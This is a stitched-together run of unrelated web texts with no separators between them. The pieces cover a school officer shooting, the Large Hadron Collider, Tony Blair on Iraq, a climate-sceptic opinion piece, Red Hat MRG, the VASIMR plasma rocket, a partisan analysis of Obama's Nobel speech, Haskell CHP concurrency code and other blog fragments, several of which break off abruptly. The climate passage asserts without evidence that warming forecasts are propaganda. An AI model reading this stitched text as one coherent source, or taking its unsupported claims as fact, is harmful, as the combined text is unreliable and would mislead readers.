According to an Associated Press report , the county coroner said one of the bullets struck Varinecz in the chest and killed him .
Asperger ’s Syndrome is a condition marked by inappropriate social interactions , “ awkward movements ” or “ odd mannerisms , ” and a “ lack of common sense . ”
Though in this case both the officer and the deceased minor are white , the NAACP released a statement Saturday condemning a “ deeply troubling trend of excessive use of force by school resource officers . ”
ADVERTISEMENT
“ There are serious questions that must be aggressively investigated , ” the NAACP said in its statement .
“ Was the officer trained in the techniques to work with individuals with autism , or mental illness ?
Did the officer use all available means to contain the situation without using deadly force ?
Should school resource officers be allowed to carry guns in schools ? ”
Deputy Solicitor Fran Humphries of the Horry County Solicitor ’s Office told NewsChannel 5 that Rhodes was “ justified in his deadly force , ” and that a final determination on the case would be issued soon .
According to a profile of him in the Myrtle Beach Herald , Marcus Rhodes has been a school resources officer since 2000 , and has been at Carolina Forest High since 2002 .
ADVERTISEMENT
“ I have always been interested in helping children learn how to make good choices in life , ” he said in that profile .
“ Teaching the dangers of drugs and alcohol to them was an ideal position for me .
…
We do a lot of mentoring students and help keeping them on the track to graduation .
We are also on - site to make sure they have a safe school environment in which to learn . ”
“ There are many dedicated law enforcement officials who serve selflessly every day but may need better training on how to handle confrontations safely , ” the NAACP stated .
“ The unfortunate incident in South Carolina underscores the urgency of implementing national standards on the use of force , training and monitoring practices so that law enforcement officers do not cause the unnecessary loss of life . ”
I was asked recently what the Large Hadron Collider , the giant particle accelerator outside Geneva , is good for .
After $ 10 billion and 15 years , the machine is ready to begin operations early next year , banging together protons in an effort to recreate the conditions of the Big Bang .
Sure , there are new particles and abstract symmetries in the offing for those few who speak the language of quantum field theory .
But what about the rest of us ?
The classic answer was allegedly given long ago by Michael Faraday , who , when asked what good was electricity , told a government minister that he did n’t know but that “ one day you will tax it . ”
Not being fast enough on my feet , I rattled off the usual suspects .
Among the spinoffs from particle physics , besides a robust academic research community , are the Web , which was invented as a tool for physicists to better communicate at CERN  the European Organization for Nuclear Research , builders of the new collider  and many modern medical imaging methods like M.R.I. ’s and PET scans .
These tests sound innocuous and even miraculous : noninvasive and mostly painless explorations of personal inner space , but their use does involve an encounter with forces that sound like they came from the twilight zone .
When my wife , Nancy , had a scan known as a Spect last fall , for what seems to have been a false alarm , she had to be injected with a radioactive tracer .
That meant she had to sleep in another room for a couple of days and was forbidden to hug our daughter .
Tony Blair has said he would have invaded Iraq even without evidence of weapons of mass destruction and would have found a way to justify the war to parliament and the public .
The former prime minister made the confession during an interview with Fern Britton , to be broadcast on Sunday on BBC1 , in which he said he would still have thought it right to remove Saddam Hussein from power .
" If you had known then that there were no WMDs , would you still have gone on ? "
Blair was asked .
He replied : " I would still have thought it right to remove him [ Saddam Hussein ] " .
Significantly , Blair added : " I mean obviously you would have had to use and deploy different arguments about the nature of the threat . "
He continued : " I can't really think we'd be better with him and his two sons in charge , but it 's incredibly difficult .
That 's why I sympathise with the people who were against it [ the war ] for perfectly good reasons and are against it now , but for me , in the end I had to take the decision . "
He explained it was " the notion of him as a threat to the region " because Saddam Hussein had used chemical weapons against his own people .
" This was obviously the thing that was uppermost in my mind .
The threat to the region .
Also the fact of how that region was going to change and how in the end it was going to evolve as a region and whilst he was there , I thought and actually still think , it would have been very difficult to have changed it in the right way . "
Though Blair has always argued that Iraq would be better off without Saddam Hussein , to parliament and the public , he always justified military action on the grounds that the Iraqi dictator was in breach of UN - backed demands that he abandon his weapons of mass destruction ( WMD ) programme .
It is possible that Blair has shifted his ground in anticipation of his appearance early next year before the Chilcot inquiry .
The inquiry has heard that Blair made clear to President George Bush at a meeting in Texas 11 months before the Iraq invasion that he would be prepared to join the US in toppling Saddam .
Blair was " absolutely prepared to say he was willing to contemplate regime change if [ UN - backed measures ] did not work " , Sir David Manning , Blair 's former foreign policy adviser , told the inquiry .
If it proved impossible to pursue the UN route , then Blair would be " willing to use force " , Manning emphasised .
The Chilcot inquiry has seen a number of previously leaked Whitehall documents which suggest Blair was in favour of regime change although he was warned by Lord Goldsmith , the attorney general , in July 2002 , eight months before the invasion , that " the desire for regime change was not a legal base for military action " .
Manning told Blair in March that year that he had underlined Britain 's position to Condoleezza Rice , Bush 's national security adviser .
" I said you [ Blair ] would not budge in your support for regime change , but you had to manage a press , a parliament , and a public opinion which is very different than anything in the States , " Manning wrote , according to a leaked Whitehall document .
A Cabinet Office document also seen by the Chilcot inquiry , dated July 2002 , stated : " When the prime minister discussed Iraq with President Bush at Crawford [ his Texas ranch ] in April , he said that the UK would support military action to bring about regime change provided that certain conditions were met : efforts had been made to construct a coalition / shape public opinion ... "
Now Blair appears to be openly admitting that evidence of WMD – the purpose behind the now discredited weapons dossier he ordered to be published with the help of MI6 and Whitehall 's joint intelligence committee – was not needed to invade Iraq , and he could have found other arguments to justify it .
Blair did say in a speech to Labour party conference in 2004 , over a year after the invasion : " I can apologise for the information [ about WMDs ] that turned out to be wrong , but I can't , sincerely at least , apologise for removing Saddam .
" The world is a better place with Saddam in prison not in power . "
Blair told the former
This Morning presenter how his religious beliefs helped him in the invasion 's immediate aftermath .
" When it comes to a decision like that , I think it is important that you take that decision as it were on the basis of what is right , because that is the only way to do it , " he said .
" I think sometimes people think my religious faith played a direct part in some of these decisions .
It really did n't .
It gives you strength if you come to a decision , to hold to that decision .
That 's how it supports your character in a situation of difficulty . "
Most " really hard " decisions involved a " downside and an upside either way " , he added .
Sir John Sawers , Blair 's former chief foreign policy adviser and now head of MI6 , told the Chilcot inquiry on Thursday that Iraq was one of several countries where Britain would have liked regime change .
Discussions took place on " political " actions to undermine Saddam , including indicting him for war crimes , Sawers said .
There was no talk in 2001 in Whitehall of military action , he added .
" There are a lot of countries ... where we would like to see a change of regime .
That does n't mean one pursues active policies in that direction . "
Had I not devoted my entire career of over half - a- century to the study and forecasting of meteorological and climate events I would have likely been concerned over the possibility of humans causing serious global climate degradation .
There has been an unrelenting quarter century of one - sided indoctrination of the western world by the media and by various scientists and governments concerning a coming carbon dioxide ( CO_2 ) induced global warming disaster .
These warming scenarios have been orchestrated by a combination of environmentalists , vested interest scientists wanting larger federal grants and publicity , the media which profits from doomsday scenario reporting , governmental bureaucrats who want more power over our lives , and socialists who want to level - out global living standards .
These many alarmist groups appear to have little concern over whether their global warming prognostications are accurate , however .
And they most certainly are not .
The alarmists believe they will be able to scare enough of our citizens into believing their propaganda that the public will be willing to follow their advice on future energy usage and agree to a lowering of their standard of living in the name of climate salvation .
More …
Red Hat is aiming for lowered latency and improved performance with the second update of the year to its real - time Linux platform .
The Linux vendor 's new MRG 1.2 ( short for Messaging , Real - Time , Grid ) release includes new tools and improved technology designed to better enhance the OS 's value for customers who rely on real - time performance .
A real - time operating system differs from other OSes in that its overall latency is lower , and system actions occur at deterministic intervals .
Providing deterministic real - time performance is all about enabling actions to occur within the same amount of time , every time -- a feature that is critical for Red Hat 's ( NYSE : RHT ) U.S military , financial services and telco customers .
Share your valuable feedback , comments or suggestions on Website Manager Webmaster
Website Manager Webmaster
The webmaster does contain the word “ Master ” , it says a lot , as a layman , we can think of a person , who is managing all the web .
Reading a lot of stuff from the Internet , this man seems to be a person , who does n’t get much help from anybody else , he does everything by himself .
A webmaster may be designer , developer of a website , who may be managing their website .
As a webmaster , it looks like a person , who does a lot of critical thinking , analysis and lot of writing in regards to the websites he manages .
He may be having a team , which may involve few SEO ’s , designers , developers , image editors , content writers who overall appreciate the webmaster .
A webmaster is a person , who keeps all the details of the website , when the page was created , what the page tells about , what are the keywords used in it , what is a description , title , and tags .
He analyses all the details with the competitor ’s pages .
Keep track of a website on various search engines – ‘ Google ’ , ’ Yahoo ’ , and ‘ Bing ’ etc .
His work is also reviewed , appraised ; he is responsible for all the maintenance of the website that is why he is Webmaster .
He is considered to be well versed with programming languages such as Perl and most of the HTML .
I have forgotten to mention , one more person , in the early of my paragraphs , Code tester , if , some programming is being done on the website , this person plays very important role , as he tests the code with various dummy data and take screenshots , coordinate with the programmer , webmaster to check if the code is serving what is required from that .
All these people work behind the scene , and the only Webmaster is treated on the screen , these people working behind the scene are talented , patient and knowledgeable people , who take co-operate and co-ordinate with the webmaster in the various activities of the website .
For a perfect website , it must be free from all the errors , and which is the responsibility of the webmaster .
Remuneration – Website Manager Webmaster
There is always some budget allocation to be done by the individuals or businesses i.e. how much they want to spend on their website .
Is it is cash - cow ; a then the owner of the website may be spending a lot on it .
Most of the websites are just mere business representations on the Internet .
Once they are online , no further actions are being performed on them .
So , they need a Webmaster only at the time of their making .
A designer or developer at that time may play a role of webmaster and that cost is being included in the website making .
But , if the website is a big portal , then there would be regular need of webmaster and he can cost around ten thousand dollars also .
It is true , that to make a website effective , you need to do investment .
There is no metric to measure the effectiveness of a website .
But , I can say that the sites which improve over time are effective .
Like any other tangible business , goal setting is must in making the website effective .
Role – Website Manager Webmaster
Webmaster plays a role of Analysis , who learns about the industry for which the website is being there or is being prepared .
He is the person , who can tell , what would be delayed action , direct action or indirect action .
Webmaster analyses Competitors websites , their position on the web , what content is there on them .
After analyzing all this , he decides marketing strategy on the Internet .
A radical , highly fuel - efficient plasma rocket whose interior operates at temperatures close to those found inside the sun has passed a key test milestone .
Trials of the space drive aboard the International Space Station are expected within the next few years .
The superpowered rocket design is known as the Variable Specific Impulse Magnetoplasma Rocket ( VASIMR ) , and it is under development by former NASA astronaut and physicist Franklin Chang Díaz at his spinout company Ad Astra Rocket .
Last week the experimental VX - 200 test rig - which is partly British made - reached its full rated 200 kilowatt power , an achievement described by the firm as a " highly coveted milestone " .
VASIMR works by turning Argon reaction mass into terrifically hot plasma - nearly as hot as " the interior of the sun " according to Ad Astra - and blasting it out of the engine 's rocket nozzle .
Because the argon is ejected with such terrific speed , a VASIMR - propelled ship would get a lot more poke out of a given amount of propellant than one driven by everyday chemical rockets .
One downside is that the amount of thrust produced is small in comparison to the plasma drive 's mass , meaning that VASIMRs could n't lift themselves out of Earth 's atmosphere .
The plasma drive would outspeed chemical rockets not by pushing harder , but by pushing for much longer , so achieving a much higher velocity over time .
Another snag is that significant amounts of electrical power are required , the generation of which is an issue in space .
For relatively easy missions close in to the Sun , VASIMRs could run usefully on solar panels , the mainstream means of generating electricity in spacecraft .
Solar - powered plasma drives , Chang Díaz says , could save fuel over chemical ones doing tasks such as maintaining the ISS in orbit , or driving ships between the Earth and Moon .
Solar VASIMR would also , according to the veteran astronaut 's calculations , be of use on a Mars mission .
However he has suggested in the past that a solar - powered Mars mission would be " technically feasible but operationally fragile " , adding that " as their robotic precursors have done , future human interplanetary spacecraft will rely on nuclear power to explore the far reaches of the solar system and beyond " .
The greater power offered by nuclear reactors would make for much more puissant interplanetary ships .
If small dustbin - sized reactors ( of the same class nowadays used in submarines ) could be employed , Chang Díaz believes that VASIMR ships could reach Mars in just 39 days , a huge improvement over chemically - propelled craft which would have to coast almost all the way and take six months .
( The concept vid above shows a longer trip using slightly different assumptions , but still very fast compared to a conventional ship ) .
Manned missions to the moons of Jupiter or other destinations in the outer Solar System would also become realistic with nuclear VASIMR .
The use of nuclear power in space is actually fairly routine , but it has occurred mostly in top - secret spy satellites and so has n't caused much debate .
Anti-nuclear protests have occurred when such tech has been used in civil craft .
For now , though , Chang Díaz and his team at Ad Astra are focused on building a flight - rated version of their technology , the VF - 200 - 1 .
This is already underway , and the successful VX - 200 fullbore trial has made engineers confident that it will work .
Plans call for the VF - 200 - 1 to be tested in space aboard the ISS in 2013 .
“ This latest achievement is a fitting tribute to the outstanding Ad Astra team .
I am proud and honored to have the opportunity to work alongside this superb group of individuals who turn dreams into reality , " says Chang Díaz . ®
CALENDAR
What ’s happening .
Please Touch Museum has extended its temporary closure into 2021 .
We will use this time to redefine the future experience of PTM in a post - pandemic world and we will continue our planning to welcome visitors again when it is safe to do so .
You can also follow us on Instagram and Facebook to stay up - to - date on our endeavors during the extended closure .
Stay well and continue to learn through play until we can be together again !
President ’s Address Defending the Use of Force When Necessary Was Reflective of the Elder Bush , Who Went to War to Stop Saddam Hussein ’s Aggression Against Kuwait With the Broad Support of the World Community — Unlike the Younger Bush , Who Defied the World to Finish Off the Iraqi Dictator in Apparent Revenge For Saddam ’s Attempt to Kill His Father
( Posted 5:00 a.m. EST Monday , December 14 , 2009 )
==============
NEWS ANALYSIS
==============
By SKEETER SANDERS
Republicans are a fickle bunch .
After months of attacking President Obama relentlessly , now , all of a sudden , they ’re praising him .
Within hours after the president accepted the 2009 Nobel Peace Prize in Oslo , Norway on Thursday , Sarah Palin , the former Alaska governor and 2008 GOP vice - presidential nominee — and one of Obama ’s most severe critics — actually applauded the president ’s acceptance speech .
“ I liked what he said , ” Palin told USA Today in an interview after the speech .
“ I talked too in my book [ Going Rogue : An American Story ] about the fallen nature of man and why war is necessary at times . ”
Only a week ago , The ‘ Skeeter Bites Report ripped Palin in a blistering editorial for lending tacit support to the “ birther ” movement — a movement motivated by racist and Islamophobic bigotry against Obama — after Palin told a right - wing radio talk - show host that she “ did n’t have a problem ” with people raising the issue of the president ’s place of birth .
It should be noted that Palin ’s eldest son , Track , is serving in the Army .
Track Palin , 20 , is currently stateside , having just returned from Iraq .
It ’s not known whether the younger Palin will return to Iraq or be sent to Afghanistan in the near future .
But Sarah Palin is n’t alone in her praise for the president .
Other conservative Republicans , including former House Speaker Newt Gingrich , compared Obama ’s speech , in which he said that there are times when the use of force is necessary for a greater good — the concept of a “ just war ” – to that of Obama ’s predecessor , George W. Bush .
Appearing on the public radio program “ The Takeaway , ” Gingrich said he thought the president ’s speech was very good .
“ He clearly understood that he had been given the prize prematurely , but he used it as an occasion to remind people , first of all , as he said , that there is evil in the world , ” Gingrich said .
“ I think having a liberal president who goes to Oslo on behalf of a peace prize and reminds the committee that they would not be free , they would n’t be able to have a peace prize , without having force …
I thought in some ways it ’s a very historic speech , ” Gingrich continued .
“ And the president , I think , did a very good job of representing the role of America which has been that of – at the risk of lives of young Americans – creating the fabric of security within which you could have a Martin Luther King Jr. or you could have a Mahatma Gandhi . ”
Palin said the president ’s remarks had a familiar ring .
“ We have to stop those terrorists over there , ” she told USA Today .
“ We ’ve learned our lesson from 9/11 .
George Bush did a great job of reminding Americans every single day that he was in office what that lesson is .
And , by the way , I ’d like to see President Obama follow more closely in the footsteps of George Bush and [ Bush ’s ] passion keeping the homeland safe , his passion for respecting – honoring our troops . ”
OBAMA : ‘THERE ARE TIMES WHEN THE USE OF FORCE IS NECESSARY . . .’
In accepting the Nobel Peace Prize , Obama acknowledged the irony of accepting the prize for peace as the commander - in - chief of a nation in the midst of two wars .
“ One of these wars [ in Iraq ] is winding down , ” the president said .
“ The other [ in Afghanistan ] is a conflict that America did not seek ; one in which we are joined by forty - three other countries — including Norway — in an effort to defend ourselves and all nations from further attacks . ”
The president told his audience that “ We must begin by acknowledging the hard truth that we will not eradicate violent conflict in our lifetimes .
There will be times when nations — acting individually or in concert — will find the use of force not only necessary but morally justified . ”
Noting that he was accepting the Peace Prize exactly 45 years to the day after Dr. Martin Luther King Jr. accepted the 1964 Peace Prize for his leadership in the nonviolent movement to win greater civil rights for African - Americans , the nation ’s first black president acknowledged that “ As someone who stands here as a direct consequence of Dr. King ’s life ’s work , I am living testimony to the moral force of nonviolence .
I know there is nothing weak , nothing passive , nothing naive in the creed and lives of [ Mahatma ] Gandhi and King . ”
But as a head of state “ sworn to protect and defend my nation , ” Obama continued , “ I can not be guided by their examples alone . ”
As president , said Obama , “ I [ must ] face the world as it is , and cannot stand idle in the face of threats to the American people .
For make no mistake : Evil does exist in the world . ”
Unfortunately , “ A nonviolent movement could not have halted Hitler ’s armies , ” the president continued .
“ Negotiations cannot convince al - Qaida ’s leaders to lay down their arms .
To say that force is sometimes necessary is not a call to cynicism .
It is a recognition of history ; the imperfections of man and the limits of reason .
I raise this point because in many countries there is a deep ambivalence about military action today , no matter the cause .
At times , this is joined by a reflexive suspicion of America , the world ’s sole military superpower . ”
‘. . .
BUT EVEN WHEN IT’S NECESSARY , WAR IS NEVER GLORIOUS ’
Nonetheless , the president continued , “ This truth must coexist with another — that no matter how justified , war promises human tragedy .
The soldier ’s courage and sacrifice is full of glory , expressing devotion to country , to cause and to comrades in arms .
But war itself is never glorious , and we must never trumpet it as such . ”
Part of the world ’s challenge “ is reconciling these two seemingly irreconcilable truths — that war is sometimes necessary , and war is at some level an expression of human feelings , ” Obama said .
“ Concretely , we must direct our effort to the task that President [ John F. ]
Kennedy called for long ago .
‘ Let us focus , ’ he said , ‘ on a more practical , more attainable peace , based not on a sudden revolution in human nature but on a gradual evolution in human institutions . ' ”
As president , Obama said , “ I believe that all nations — strong and weak alike — must adhere to standards that govern the use of force .
I — like any head of state — reserve the right to act unilaterally if necessary to defend my nation .
Nevertheless , I am convinced that adhering to standards strengthens those who do , and isolates — and weakens — those who do n’t . ”
Obama noted that “ The world rallied around America after the 9/11 attacks , and continues to support our efforts in Afghanistan , because of the horror of those senseless attacks and the recognized principle of self - defense .
Likewise , the world recognized the need to confront Saddam Hussein when he invaded Kuwait — a consensus that sent a clear message to all about the cost of aggression . ”
Without mentioning his predecessor by name — but reminding his audience of Bush ’s actions that drew fierce international opposition — the president acknowledged that “ America cannot insist that others follow the rules of the road if we refuse to follow them ourselves .
For when we do n’t , our actions can appear arbitrary , and undercut the legitimacy of future intervention — no matter how justified . ”
Obama acknowledged that in those situations where force is necessary , “ we have a moral and strategic interest in binding ourselves to certain rules of conduct .
And even as we confront a vicious adversary that abides by no rules , I believe that the United States of America must remain a standard bearer in the conduct of war .
That is what makes us different from those whom we fight .
That is a source of our strength .
“ That is why I prohibited torture , ” the president continued .
“ That is why I ordered the prison at Guantanamo Bay closed .
And that is why I have reaffirmed America ’s commitment to abide by the Geneva Conventions .
We lose ourselves when we compromise the very ideals that we fight to defend .
And we honor those ideals by upholding them not just when it is easy , but when it is hard . ”
REPUBLICANS COMPARING OBAMA TO THE WRONG GEORGE BUSH
It was clear from his speech that Obama was evoking several of his predecessors — including Jimmy Carter , who , in his 1980 State of the Union address following the 1979 Soviet invasion of Afghanistan , declared that the United States would use military force if necessary to defend its national interests in the Persian Gulf region .
So it should come as no surprise that conservative Republicans would draw comparisons between Obama and George W. Bush .
The trouble is , they ’re comparing the president to the wrong Bush .
Obama ’s speech was far more reflective of his predecessor ’s father , George H.W. Bush — and , at the same time , a damning indictment of his son .
For Bush 41 did something that Bush 43 failed to do :
He went to war with the full support of the world community to stop an aggressor that attacked a neighboring nation .
The elder Bush — a World War II veteran — went to the United Nations and won a series of Security Council resolutions demanding Iraq withdraw its troops from Kuwait .
When Iraq refused to comply , the Security Council ultimately authorized the use of force to remove them .
What ’s forgotten is that the elder Bush also reached out to the Arab League , which passed its own resolutions condemning the Iraqi invasion .
Saudi Arabia — the world ’s most important oil producer and exporter — was particularly fearful that Saddam would later send his armies to seize its northern oil fields .
At the request of King Fahd , Bush sent U.S. troops to northern Saudi Arabia to prevent such an invasion .
In the months that followed , the elder Bush succeeded in building a coalition of 34 countries — the largest international military alliance since World War II — to join forces with the U.S. in opposing the Iraqi invasion .
Significantly , the coalition included 11 Muslim nations .
By the time the UN Security Council authorized the use of force against Iraq and the Gulf War began on January 17 , 1991 , there were forces on the ground from Argentina , Australia , Bahrain , Bangladesh , Belgium , Canada , Denmark , Egypt , France , Greece , Italy , Kuwait , Morocco , The Netherlands , New Zealand , Niger , Norway , Oman , Pakistan , Philippines , Portugal , Qatar , South Korea , Saudi Arabia , Senegal , Sierra Leone , Singapore , Spain , Syria , the United Arab Emirates , the United Kingdom and the United States .
Although they did not contribute any forces , the 33rd and 34th countries in the anti-Iraq alliance — Japan and Germany — made financial contributions totaling $ 10 billion and $ 6.6 billion respectively .
Nonetheless , Americans made up 73 percent of the alliance ’s nearly one million troops deployed against Iraq .
BUSH SR .
WARNED IN HIS MEMOIRS THAT TOPPLING SADDAM WOULD HAVE ‘INCURRED INCALCULABLE COSTS ’
After successfully driving Iraqi forces out of Kuwait , the elder Bush rejected strong urgings from conservatives to advance U.S. forces into Baghdad to topple Saddam ’s regime .
Indeed , after the Gulf War ended , conservatives sharply criticized Bush Sr. for allowing Saddam Hussein to remain in power .
The elder Bush fired back in his 1998 memoir , A World Transformed , which was co-written by his national security adviser , Brent Scowcroft .
“ Trying to eliminate Saddam , extending the ground war into an occupation of Iraq , ” Bush wrote , “ would have violated our guideline about not changing objectives in midstream , engaging in ‘ mission creep , ’ and would have incurred incalculable human and political costs .
. .
“ We would have been forced to occupy Baghdad and , in effect , rule Iraq , ” the elder Bush wrote .
“ The coalition would instantly have collapsed , the Arabs deserting it in anger and other allies pulling out as well .
Under the circumstances , there was no viable ‘ exit strategy ’ we could see , violating another of our principles . ”
FLASHBACK : SADDAM TRIED TO KILL BUSH SR .
DURING 1993 VISIT TO U.S. TROOPS IN KUWAIT
The 41st president ’s son either never read his father ’s memoirs or , if he did read them , chose to ignore his father ’s warning about toppling Saddam Hussein .
As it turned out , Bush 43 went to war in defiance of the world community and invaded another country without provocation to topple the very same dictator who had sent his army into Kuwait 13 years earlier .
The 43rd president ’s publicly stated motivation was to rid Iraq of its stockpile of chemical and biological weapons of mass destruction .
But it turned out that no such stockpile existed — nearly all of Iraq ’s WMDs had been destroyed within six months after the Gulf War ended , but Saddam kept up the appearance that Iraq still had them to deter an attack , according to Hans Blix , the former chief weapons inspector for the UN .
But Bush 43 refused to see it that way — at least not publicly .
So what was George W. Bush ’s real motivation for going to war to topple Saddam Hussein ?
Simply put , revenge .
Bush 43 wanted to exact revenge against Saddam Hussein for his attempt to kill Bush ’s father .
And he was going to take down Saddam no matter what the world thought of it , according to secret transcripts revealed in October 2007 by Spain ’s largest daily newspaper , El Pais .
In case you ’ve forgotten , let ’s travel back in time to February 1993 .
The elder Bush — having turned the keys to the White House over to his successor , Bill Clinton , just a month earlier — was visiting U.S. troops stationed in Kuwait , ostensibly to say farewell as their commander - in - chief and to congratulate them for liberating Kuwait from Iraqi occupation .
But Bush had a target on his back .
Saddam Hussein — his armies driven out of Kuwait and much of his country ’s infrastructure laid waste by U.S. and allied bombs and missiles — saw an opportunity to exact revenge against his nemesis , the United States , by killing the man who routed his army .
So Saddam sent a team of assassins to Kuwait to kill Bush — but they were quickly captured by Kuwaiti security forces .
The Kuwaiti authorities arrested 17 people who allegedly planned to drive a car loaded with explosives near Bush and detonate it , killing the former president .
Through interviews with the suspects and examinations of the bombs ’ circuitry and wiring , the FBI established that the plot had been carried out by the Iraqi Intelligence Service , according to the PBS documentary series , “ Frontline . ” A Kuwaiti court later convicted all but one of the defendants .
Two months after it was foiled , the assassination plot was revealed to the world .
In retaliation , President Clinton ordered the firing of 23 Tomahawk cruise missiles to destroy the Iraqi Intelligence Service ’s headquarters in Baghdad .
The day before the strike commenced , Madeleine Albright , then the U.S. Ambassador to the United Nations , went before the Security Council to present evidence of the Iraqi plot .
After the missiles were fired , Vice President Al Gore said the attack “ was intended to be a proportionate response at the place where this plot ” to assassinate Bush “ was hatched and implemented . ”
The Clinton administration subsequently authorized the CIA in 1996 to organize a coup against Saddam , only to be foiled by the dictator ’s intelligence service .
BUSH 43 PLOTTED TO OVERTHROW SADDAM FROM THE DAY HE TOOK OFFICE
That the younger Bush wanted to exact revenge against Saddam for attempting to kill his father was revealed by Bush himself , when in an address to the UN General Assembly in September 2002 , he let it slip that “ In 1993 , Iraq attempted to assassinate the Amir of Kuwait and a former American president . ”
Bush later admitted publicly that he made preparations to overthrow Saddam as soon as he took office .
“ The stated policy of my administration toward Saddam Hussein was very clear — like the previous administration , we were for regime change , ” Bush told reporters in 2004 in a joint news conference with Mexico ’s then - President Vicente Fox .
“ And in the initial stages of the administration , as you might remember , we were dealing with ( enforcing a no - fly zone over Iraq ) and so we were fashioning policy along those lines . ”
Bush said the September 11 attacks put him “ on a hair trigger ” to take pre-emptive action against Iraq rather than wait for evidence of a new threat to Americans .
But the fact is , Bush 43 used the 9/11 attacks as a pretext to move forward with his months - long plans to overthrow Saddam .
While neither of the Bushes , father and son , will admit it publicly , there was a deep ideological divide between them , according to author Craig Unger in his book , The Fall of the House of Bush .
“ George H.W. Bush was a genial man with few bitter enemies , ” Unger writes , “ but his son had managed to appoint — as secretary of defense no less — one of the very few who fit the bill : Donald Rumsfeld .
Once Rumsfeld and Vice President Dick Cheney took office — the latter supposedly a loyal friend — they had brought in one neoconservative policymaker after another to the Pentagon , the vice president ’s office , and the National Security Council .
“ In some cases , ” Unger continued , “ these were the same men who had battled the elder Bush when he was head of the CIA in 1976 .
These were the same men who fought him when he decided not to take down Saddam Hussein during the 1991 Gulf War .
Their goal in life seemed to be to dismantle his legacy . ”
And , indeed , they did .
How else can you explain today ’s Republicans comparing Obama to the younger Bush , who brought disgrace to this country ’s good name during his eight years in the White House ?
A more intriguing question : Given the apparent ideological rift between father and son , was Bush 43 out to “ one - up ” his father by getting rid of Saddam ?
The answer to that question perhaps can be better answered by the historians .
But for today ’s Republicans to compare Obama to Bush 43 is an insult — not only to Obama , but also to Bush 41 .
# # #
Copyright 2009 , Skeeter Sanders .
All rights reserved .
This post has been reviewed by the Vancouver Media Co-op editorial committee .
VMC Video Exclusive : Amy Goodman speaks in Vancouver
→ Cooperatives , → Video , → 2010 Olympics
Download Video
Download Audio
By the time Amy Goodman spoke to a standing room only crowd at Vancouver 's Public Library on Wednesday , November 25 , there was one thing on everyone 's mind : the 2010 Olympics .
Goodman 's talk started over an hour late , because the US radio host was detained by Canadian Border Services Agency , who asked her if she would be talking about the Olympics during her speech .
" I 'm embarrassed , cause as some people who know me know , I 'm not a real sports fan , " said Goodman , who said her knowledge of the 2010 Olympics was " exactly zero . "
" To say the least I 'm very taken aback by what I just went through , very shocked to be asked what I was going to talk about , and to see my colleagues computers being gone through " at the border , she said , before proceeding with her talk .
Camera - Carlos Melendez and Driss Abassi
Editing - Franklin López
Text - Dawn Paley
There was an interesting article posted last night on the GHC blog on the matter of concurrency and parallelism .
Several commenters seem to have taken issue with the definitions of concurrency and parallelism used in the article .
I think they are absolutely fine ( and standard ) , and I found little in the article to disagree with .
One thing I do disagree with is the idea that “ if all we want to do is make programs run faster on a multicore , concurrency should be a last resort ” —
I aim in this blog to show that concurrent programming can be straightforward and elegant .
Concurrency is not something to be afraid of .
On similar lines of disagreement , I also think that concurrency is useful for more than the applications listed there .
My boids example does not seem to fit the applications for concurrency mentioned in the article , but I think that reasoning about the boids ( or indeed , any simultation agents ) as self - contained stateful processes with an outside interface is easier than thinking about them in an iterative - functional way ( e.g. as a list of boid states that need an update function applied to them ) .
Your opinion may differ .
Regardless of such disagreements , the article also made a good point about types which I would like to expand on , and relate to CHP .
One of the great advantages of Haskell is its type system .
The difference between a -> IO a and a -> a is huge and vital .
A large part of Haskell ’s strength comes from showing this difference in the type , using the type - system to reason about it — which allows type - checker to prevent mis-uses .
The article ’s author points out that pure functions run in parallel are guaranteed to be deterministic — which means they retain their pure type .
So bigExpensiveComputation has the type a -> a , regardless of whether it ’s calculated sequentially or in parallel ( this difference becomes a run-time detail ) .
So the determinism of the algorithm involved has remained captured at the type - level , if you use parallel annotations .
So how does this relate to CHP ?
With semi-explicit parallelism annotations ( par , pseq , strategies and the rest ) , you can create a parMap function , with the same type as map , that does all the evaluations in parallel ( say , to RNF using the NFData type - class ) :
parMap : : NFData b => ( a -> b ) -> [ a ] -> [ b ]
Anything that can be evaluated in parallel using Haskell ’s parallelism can also be evaluated in parallel using Haskell ’s concurrency .
Here ’s a complete CHP implementation of parMap :
parMap :: NFData b => ( a -> b ) -> [ a ] -> CHP [ b ] parMap f xs = do cs <- replicateM ( length xs ) oneToOneChannel liftM snd $ ( runParallel $ map ( uncurry writeChannelStrict ) ( zip ( writers cs ) ( map f xs ) ) ) < ||> mapM readChannel ( readers cs )
It may have slightly higher run-time overheads , but semantically and operationally the effect is exactly as you ’d expect ( map , but in parallel ) and it is just as deterministic as the deterministic parallel version based on strategies ( if there are no bottoms involved ) .
So what ’s different ?
The type .
My version acts in the CHP monad , whereas the original was pure .
They are both deterministic but the CHP version no longer reveals that in the type — it is indistinguishable from any non-deterministic or deadlocking process that can exist in the full message - passing system of CHP .
So it seems that is the real strength of Haskell ’s parallelism over concurrency : the type system knows / shows that the parallel annotations produce deterministic code , whereas the concurrent version does not share that advantage .
And without a model checker in the type system ( ! ) , I suspect it may not be possible to fix that .
Dave Neiwert and I have been writing a book for over two months now and in my research I discovered how easily manipulated movement conservatives from the 70's and 80's are when it comes to characters they see in film and television .
It also extends to today , since we 've seen how the torture scenes in 24 have also had an impact on right - wingers .
I never believed previously that music or TV shows could really influence people in their thinking because we can discern the difference between reality and fiction , but not so for conservatives .
After right - wing extremist conservatives like Ralph Reed and Grover Norquist watched the movie Patton , they totally flipped out over it and became obsessed with the anti-communism and pro-military stances it championed .
They believed Scott was real .
In Nina Easton 's book , Gang of Five , she detailed Ralph Reed and other College Republican leaders ' reactions to George C. Scott 's performance in the movie :
Several hundred college students cheering a call to arms is something I shall not forget .
In short order , gruesome Patton guerrilla talk became Ralph 's forte : " I paint my face and travel at night , " he infamously explained to a reporter ten years later .
" You do n't know it 's over until you 're in a body bag . " --
One year , the College Republicans Christmas card featured a photo of Patton standing on a stone , binoculars in hand , under the words , " Merry Christmas from the front . "
Abramoff , who cultivated an image of a reasonable adult , forswore Patton 's gutter language ( though he got a thrill out of the fact that screen writer Francis Ford Coppola had intended his audiences to be horrified by Patton 's antics , when in reality young conservatives fell in love with the tyrannical general . )
So I fell off my couch laughing when Bill O'Reilly inserted scenes from Patton to attack President Obama 's Afghanistan speech with the other night .
Movement conservatives obviously view war as a fictitious movie , explosions and intense battles used for nothing more than dramatic effect .
And the lives lost are but mere props .
They actually believed that George C. Scott was General Patton , and so they want Democratic politicians to live up to an Oscar - winning actor 's performance rather than the reality we actually face .
Whenever progressives pointed out Bush 's awful communication skills , they defended him at every turn .
